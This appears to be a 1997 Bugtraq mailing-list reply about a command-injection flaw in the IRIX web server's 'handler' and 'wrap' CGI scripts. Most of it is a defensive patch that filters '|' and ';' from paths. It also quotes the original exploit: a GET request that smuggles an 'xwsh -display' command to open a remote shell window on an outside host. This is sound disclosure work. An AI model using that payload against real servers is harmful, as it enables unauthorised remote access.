[5000] in bugtraq
Re: CPSR 7: IRIX WWW Server
daemon@ATHENA.MIT.EDU (J.A. Gutierrez)
Thu Jul 24 03:32:10 1997
Date: Wed, 23 Jul 1997 21:08:29 +0200
Reply-To: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.NEB.3.95.970723121636.26440A-100000@corinne.cpio.org> from
"Corinne Posse Releases" at Jul 23, 97 12:17:56 pm
>
> telnet www.highly.respectable.bank.com 80
> Trying 300.300.300.1...
> Connected to www.highly.respectable.bank.com
> Escape character is '^]'.
> GET /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=Download
>
to fix: disable both or patch them:
###########################################################################
*** handler.orig Wed Jul 23 20:49:26 1997
--- handler Wed Jul 23 20:55:25 1997
***************
*** 26,31 ****
--- 26,32 ----
$pathRoot = $_[$#_] ;
$doc = $ROOT.$PATH ;
+ $_ = $PATH;
&ErrBadPath unless &ValidPath ; # Check for server spoofing
#__________________________________________________________
***************
*** 108,113 ****
--- 109,117 ----
sub ValidPath
{
+ # suggested by drazvan@kappa.ro
+ if (/[|;]/) { return '' };
+
return 1 unless /\.\./ ;
return '' if /^\.\./ ;
***************
*** 117,120 ****
--- 121,136 ----
return 1 ;
}
+ sub ErrBadPath
+ {
+ print <<ENDOFTEXT ;
+ Content-type: text/html
+ <HEAD><TITLE>404 Not Found</TITLE></HEAD>
+ <BODY><H1>404 Not Found</H1>
+ The requested URL $PATH was not found on this server.<P>
+ </BODY>
+ ENDOFTEXT
+
+ die ;
+ }
*** wrap.orig Wed Jul 23 20:51:08 1997
--- wrap Wed Jul 23 20:51:08 1997
***************
*** 66,71 ****
--- 66,74 ----
$doc = $ROOT.$PATH ;
&DefaultMesg if ! defined $PATH || $PATH eq "" ; # Get a base listing =)
+
+ $_ = $PATH;
+
&ErrBadPath unless &ValidPath ; # Check for server spoofing
&ErrBadPath unless -e $doc ; # Check to see it exists
&HandleDownload if -f $doc ; # Do the right thing
***************
*** 242,247 ****
--- 245,253 ----
sub ValidPath
{
+ # suggested by drazvan@kappa.ro
+ if (/[|;]/) { return '' };
+
return 1 unless /\.\./ ;
return '' if /^\.\./ ;
###########################################################################
comments welcome
--
.signature intentionally left blank
